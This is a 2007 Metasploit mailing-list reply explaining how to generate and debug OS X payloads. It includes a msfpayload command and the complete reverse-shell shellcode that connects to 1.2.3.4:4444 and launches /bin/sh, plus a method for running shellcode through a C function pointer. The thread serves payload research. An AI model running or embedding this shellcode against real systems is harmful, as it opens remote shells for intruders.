[framework] msfpayload mach-o
H D Moore
hdm at metasploit.com
Fri Aug 17 16:56:14 CDT 2007
On Friday 17 August 2007 16:47, Daniel Guido wrote:
> Are there any plans to write a Rex::Text.to_osxmacho function? :-)
Not yet, any volunteers? ;-)
> If I wanted to disassemble the OSX x86 payloads to see what they're
> doing, how could I write a small program to compile them and load them
> into gdb? (assuming that's the best way to go about it). I'm a little
> stuck.
Try something like:
$ msfpayload osx/x86/payload_name OPT=VAL C
Take this code, put it into a C file that casts the shellcode array to a
function pointer, then calls it (lots of examples in the shellcode
section of milw0rm.com). Then compile and breakpoint like any other app.
Example:
$ msfpayload osx/x86/shell_reverse_tcp LHOST=1.2.3.4 C
/*
* osx/x86/shell_reverse_tcp - 65 bytes
* http://www.metasploit.com
* AppendExit=false, PrependSetresuid=false,
* PrependSetuid=false, LPORT=4444, PrependSetreuid=false,
* LHOST=1.2.3.4
*/
unsigned char buf[] =
"\x68\x01\x02\x03\x04\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";
Example C:
http://milw0rm.com/shellcode/536 PPC
http://milw0rm.com/shellcode/504 X86
-HD
More information about the framework
mailing list